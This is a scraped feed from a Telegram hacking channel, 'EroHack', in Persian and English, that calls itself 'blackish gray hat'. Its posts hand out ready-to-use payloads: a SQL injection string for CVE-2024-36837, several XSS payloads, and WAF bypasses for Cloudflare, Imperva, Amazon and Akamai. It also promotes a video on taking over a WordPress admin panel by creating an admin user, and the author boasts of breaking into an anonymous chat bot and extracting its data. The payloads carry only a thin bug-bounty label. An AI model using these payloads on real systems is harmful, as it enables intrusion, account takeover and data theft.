Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
Media is too big
VIEW IN TELEGRAM
⚡️آموزش نفوذ به پنل وردپرس با پلاگین

توضیحات:
با استفاده از یک پلاگین ساده تونستیم آدرس صفحه لاگین ادمین رو پیدا کنیم و یک کاربر با سطح دسترسی ادمین ایجاد کنید.


#WordPress #hack #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍1🎃1🫡1👾1
Security-WP.zip
1.4 KB
⚪️مربوط به پست بالا⚪️
pass: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯7👍1💯1
😠SQLI Injection
CVE: 2024-36837

💻Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 


#BugBounty #Tips
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6💯1👾1
😀XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
💜Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2💯2🫡1
This media is not supported in your browser
VIEW IN TELEGRAM
🤨10🗿2👎1🔥1😐1
Eʀᴏ ··ʜᴀᴄᴋ··
Video message
سلام درود🫡
محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم.
میتونید از لینک زیر رایت‌آپ رو بخونید
و استفاده کنید.

hello everyone
The content of the video message above is that yesterday I was able to hack into an anonymous chatbot and mine the data.
You can read and use the article from the link below.

write-up:
https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed


برای قرار دادن آموزش ری‌اکشن بزنید.🙌🏻
React to insert tutorial.🙌🏻
🔥17😐3🎃3👍1👾1
XSS WAF Bypass:

Imperva
<details/open/id="&quote;"ontoggle=[JS]>


Amazon
<details/open/id="&quote;"ontoggle=[JS]>


Akamai
<details open id="' &quote;'"ontoggle=[JS]>


EroHack
🗯Boost
📣Twitter
👍61🤨1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «سلام درود🫡 محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم. میتونید از لینک زیر رایت‌آپ رو بخونید و استفاده کنید. hello everyone The content of the video message above is that yesterday I was able…»
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack
🗯Boost
📣Twitter
🔥51👍1💯1🤨1
Media is too big
VIEW IN TELEGRAM
Introducing the "VulnScan" tool

توضیحات:
ابزار "VulnScan" یک که در زمینه جمع آوری اطلاعات از یک سایت طراحی شده و به شما کمک میکنه اطلاعات مهمی از تارگت خودتون پیدا کنید.
امکانت ابزار از جمله پورت‌اسکن، آسیب پذیری باگ LFI، آسیب پذیری باگ XSS و غیره است.
اطلاعات تکمیلی رو میتونید در فیلم بالا مشاهده کنید.
برای تهیه ابزار میتونید به آیدی زیر پیام بدید.


Description:
The VulnScan tool is designed to gather information from a site and help you find important information about your target.
Features of this tool include port scanning, "LFI" bug vulnerability, "XSS" bug vulnerability, etc.
Additional information can be seen in the video above.
To get the tool, you can send a message to the following address. There is a discount for the first ten people.


#tool #webhacking #bugbounty #XSS

🆔 @gorunero
EroHack
🗯Boost
📣Twitter
👍8🔥2👾1
سلام خدمت دوستان عزیز ویس بالا رو
گوش بدید شاید به کارتون امد.

ID: @gorunero
👍9🤣4🔥1👾1
افراد در دنیای حقیقی
نه به اندازه Instagramشون خوشحال،
نه به اندازه Twitterشون فهمیده،
و نه به اندازه Linkedinشون موفق‌ هستن!
👍26🤣7🤯2🗿2🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Bug Bounty.pdf
842.5 KB
💻 آماده‌ای برای ورود به دنیای هیجان‌انگیز باگ بانتی؟
📜 این مقاله کامل و کاربردی، مسیر تبدیل شدن به یه هانتر حرفه‌ای رو برات روشن می‌کنه.
مطالعه کن، یاد بگیر و یادت نره که این دانش رو با دوستات هم به اشتراک بذاری!
🔗EroHack
👍4🔥1
Nobitex Hack.pdf
532.2 KB
🔥 هک نوبیتکس؛ بزرگ‌ترین حمله سایبری به صرافی ایرانی!
می‌خوای بدونی چطور یه گروه هکری حرفه‌ای تونست میلیون‌ها دلار دارایی کاربران رو از دسترس خارج کنه؟
ما همه جزئیات فنی، نقاط ضعف امنیتی و پیامدهای سیاسی این حمله رو به زبون ساده و تخصصی برات آوردیم.
🚀 این مقاله رو از دست نده، بخون و بفرست برای دوستات!
🔗EroHack
👍3🔥1🤯1😐1
This media is not supported in the widget
VIEW IN TELEGRAM
🔥3💯2
🛡 سوال باگ بانتی - امنیت وب
📊 سطح: متوسط
کدام یک از هدرهای زیر بیشترین نقش را در جلوگیری از حمله XSS دارد؟
Anonymous Quiz
30%
A) X-Frame-Options
57%
B) Content-Security-Policy
12%
C) Strict-Transport-Security
🔥2🤯1🤨1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1